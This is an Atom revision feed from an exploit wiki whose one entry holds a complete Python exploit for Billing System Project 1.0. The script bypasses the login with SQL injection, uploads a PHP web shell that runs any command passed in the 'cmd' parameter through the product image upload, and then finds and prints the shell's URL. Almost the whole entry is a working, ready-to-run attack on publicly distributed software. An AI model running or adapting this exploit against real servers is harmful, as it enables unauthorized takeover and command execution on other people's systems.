<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Billing System Project 1.0 遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T18:54:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6429&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https:/...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6429&amp;oldid=prev"/>
		<updated>2021-07-07T02:53:08Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https:/...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)&lt;br /&gt;
# Date: 06.07.2021&lt;br /&gt;
# Exploit Author: Talha DEMİRSOY&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html&lt;br /&gt;
# Version: V 1.0&lt;br /&gt;
# Tested on: Linux &amp;amp; Windows&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import random&lt;br /&gt;
import string&lt;br /&gt;
from bs4 import BeautifulSoup&lt;br /&gt;
&lt;br /&gt;
let = string.ascii_lowercase&lt;br /&gt;
shellname = ''.join(random.choice(let) for i in range(15))&lt;br /&gt;
randstr = ''.join(random.choice(let) for i in range(15))&lt;br /&gt;
&lt;br /&gt;
payload= &amp;quot;&amp;lt;?php if(isset($_GET['cmd'])){ echo '&amp;lt;pre&amp;gt;'; $cmd =&lt;br /&gt;
($_GET['cmd']); system($cmd); echo '&amp;lt;/pre&amp;gt;'; die; } ?&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
url = input(&amp;quot;Target : &amp;quot;)&lt;br /&gt;
&lt;br /&gt;
session = requests.session()&lt;br /&gt;
&lt;br /&gt;
reqUrl = url + &amp;quot;login.php&amp;quot;&lt;br /&gt;
reqHead = {&amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;}&lt;br /&gt;
reqData = {&amp;quot;username&amp;quot;: &amp;quot;admin' or '1'='1'#&amp;quot;, &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;, &amp;quot;login&amp;quot;: ''}&lt;br /&gt;
session.post(reqUrl, headers=reqHead, data=reqData)&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;Shell Uploading...&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
reqUrl = url + &amp;quot;php_action/createProduct.php&amp;quot;&lt;br /&gt;
reqHead = {&amp;quot;Content-Type&amp;quot;: &amp;quot;multipart/form-data;&lt;br /&gt;
boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB&amp;quot;}&lt;br /&gt;
reqData =&lt;br /&gt;
&amp;quot;\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;currnt_date\&amp;quot;\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data; name=\&amp;quot;productImage\&amp;quot;;&lt;br /&gt;
filename=\&amp;quot;&amp;quot;+shellname+&amp;quot;.php\&amp;quot;\r\nContent-Type:&lt;br /&gt;
application/octet-stream\r\n\r\n&amp;quot;+payload+&amp;quot;\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;productName\&amp;quot;\r\n\r\n&amp;quot;+randstr+&amp;quot;_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;quantity\&amp;quot;\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;rate\&amp;quot;\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;brandName\&amp;quot;\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;categoryName\&amp;quot;\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;productStatus\&amp;quot;\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:&lt;br /&gt;
form-data;&lt;br /&gt;
name=\&amp;quot;create\&amp;quot;\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n&amp;quot;&lt;br /&gt;
session.post(reqUrl, headers=reqHead, data=reqData)&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;product name is &amp;quot;+randstr)&lt;br /&gt;
print(&amp;quot;shell name is &amp;quot;+shellname)&lt;br /&gt;
&lt;br /&gt;
reqUrl = url + &amp;quot;product.php&amp;quot;&lt;br /&gt;
data = session.get(reqUrl)&lt;br /&gt;
&lt;br /&gt;
parser = BeautifulSoup(data.text, 'html.parser')&lt;br /&gt;
find_shell = parser.find_all('img')&lt;br /&gt;
&lt;br /&gt;
for i in find_shell:&lt;br /&gt;
    if shellname in i.get(&amp;quot;src&amp;quot;):&lt;br /&gt;
        print(&amp;quot;Shell URL : &amp;quot; + url  + i.get(&amp;quot;src&amp;quot;) + &amp;quot;?cmd=whoami&amp;quot;)           &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>